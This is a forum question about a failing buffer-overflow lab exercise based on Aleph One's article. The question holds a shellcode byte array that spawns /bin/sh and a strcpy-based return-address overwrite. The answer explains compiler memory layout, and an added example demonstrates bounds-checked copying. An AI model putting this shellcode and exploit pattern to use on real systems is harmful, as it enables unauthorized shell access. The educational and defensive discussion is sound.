
How to write a buffer overflow?

I've been doing buffer overflow tests; mostly I read from Aleph One's Smashing The Stack For Fun And Profit.

#include<string.h>
#include<stdio.h>

char shellcode[]=
    "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0"
    "\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x8\x8d\x53\x0c\xcd\x80\xe8"
    "\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4e\x58\x58\x58\x58"
    "\x59\x59\x59\x59";

char large_str[104]; /*length equals to buffer + i + ptr + return_address*/

int main(){
    char buffer[56];/*same length as shellcode*/
    int i;
    long *ptr=(long*)large_str;

    memset(&large_str,0,104); /*initialize large_str*/
    for(i=0;i<24;i++)
            *(ptr+i)=(int)buffer; /*overwrite return address*/

    for(i=0;i<strlen(shellcode);i++)
            large_str[i]=shellcode[i];



    strcpy(buffer,large_str); /*doing overflow*/
    return 0;
}

doing

$gcc -o overflow -fno-stack-protector overflow.c
$./overflow
segmentation fault (core dumped)

Before doing this, I had already turned address randomization off. Also, I've tested my shellcode in a program:

int main(int argc, char **argv)
{
    int (*func)();
    func=(int(*)())code; /* code is the shellcode byte array from the listing above */
    (int)(*func)();
}

It works. So I don't know what's wrong with my buffer overflow code; is there anyone who has experience with a buffer overflow lab? I debugged with gdb, and it seems I didn't overwrite the return address properly.

Your code makes assumptions on where stuff like buffer will be in memory.

And what was valid for a set of compilers in 1996, from when your article is, is simply not true anymore, 20 years later in 2016.

This has nothing to do with stack protection, or address layout randomization. It's simply that there's no reason the compiler should put the return address pointer right after your large_str – the compiler isn't stupid and sees that buffer is allocated in main, anyways, so it will just pick any location that seems convenient in memory to store buffer. And there's absolutely no reason to assume that this is

  1. on the stack to begin with (why should it? The compiler knows its lifetime, so it could as well be anywhere), see stack and heap are not what you think.
  2. The memory layout will be return pointer – large_str – anything else. There's nothing that defines that. And there shouldn't be. It's a choice to be made by the compiler, and frankly, it probably won't make the same choice as you.
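The two points above can be checked directly. The following program is an added example, written by the editor and not code from the poster or the answerer. It mirrors the question's sizes (a 56-byte destination, a 104-byte source array, both names assumed from the listing), shows that the unchecked strcpy must write past the buffer, puts a bounds-checked copy beside it that rejects the over-long input, and then prints where the compiler actually placed buffer, i and ptr relative to the frame address using the GCC/Clang builtin __builtin_frame_address (an assumption about the toolchain; the offsets it prints are compiler-, flag- and ABI-dependent, which is exactly the answer's point).

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example, not the poster's or answerer's code. Sizes mirror the
 * question's main(): a 56-byte buffer and a 104-byte source array. */
enum { DST_SZ = 56, SRC_SZ = 104 };

/* Constructed stand-in for large_str: SRC_SZ-1 'A' bytes plus a terminator. */
const char *sample_large_str(void) {
    static char src[SRC_SZ];
    memset(src, 'A', SRC_SZ - 1);
    src[SRC_SZ - 1] = '\0';
    return src;
}

/* Returns 1 when strcpy(dst, src) would write past a dst of dst_size bytes
 * (the terminator needs one extra byte), 0 when the copy fits. */
int strcpy_would_overflow(size_t dst_size, const char *src) {
    return strlen(src) + 1 > dst_size;
}

/* Hardened replacement for the unchecked strcpy: refuse over-long input
 * instead of truncating silently or overflowing. 0 on success, -1 if rejected. */
int copy_bounded(char *dst, size_t dst_size, const char *src) {
    size_t n = strlen(src);
    if (dst_size == 0 || n + 1 > dst_size)
        return -1;
    memcpy(dst, src, n + 1);
    return 0;
}

/* Copy src into a DST_SZ local buffer with copy_bounded; -1 means rejected. */
int try_copy_into_buffer(const char *src) {
    char buffer[DST_SZ];
    return copy_bounded(buffer, sizeof buffer, src);
}

/* Where did the compiler actually put the locals? Prints each local's signed
 * distance below the frame address (GCC/Clang builtin). volatile keeps the
 * locals in memory even when optimizing. Returns buffer's distance in bytes. */
long report_local_layout(void) {
    volatile char buffer[DST_SZ];
    volatile int i = 0;
    volatile long *volatile ptr = (volatile long *)buffer;
    uintptr_t frame = (uintptr_t)__builtin_frame_address(0);

    printf("frame address: %#lx\n", (unsigned long)frame);
    printf("buffer at frame - %ld\n", (long)(frame - (uintptr_t)buffer));
    printf("i      at frame - %ld\n", (long)(frame - (uintptr_t)&i));
    printf("ptr    at frame - %ld\n", (long)(frame - (uintptr_t)&ptr));
    (void)i;
    (void)ptr;
    return (long)(frame - (uintptr_t)buffer);
}

int main(void) {
    const char *src = sample_large_str();
    printf("strcpy of %zu bytes into a %d-byte buffer overflows: %d\n",
           strlen(src) + 1, DST_SZ, strcpy_would_overflow(DST_SZ, src));
    printf("copy_bounded(large_str): %d (rejected)\n", try_copy_into_buffer(src));
    printf("copy_bounded(\"/bin/sh\"): %d (fits)\n", try_copy_into_buffer("/bin/sh"));
    report_local_layout();
    return 0;
}
```

Build it with the same flags as the question (gcc -fno-stack-protector) and then once more with -O2 or a different compiler: the first two lines stay the same, while the layout lines change, because nothing in the language fixes the order of buffer, i and ptr or their distance from the saved return address.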
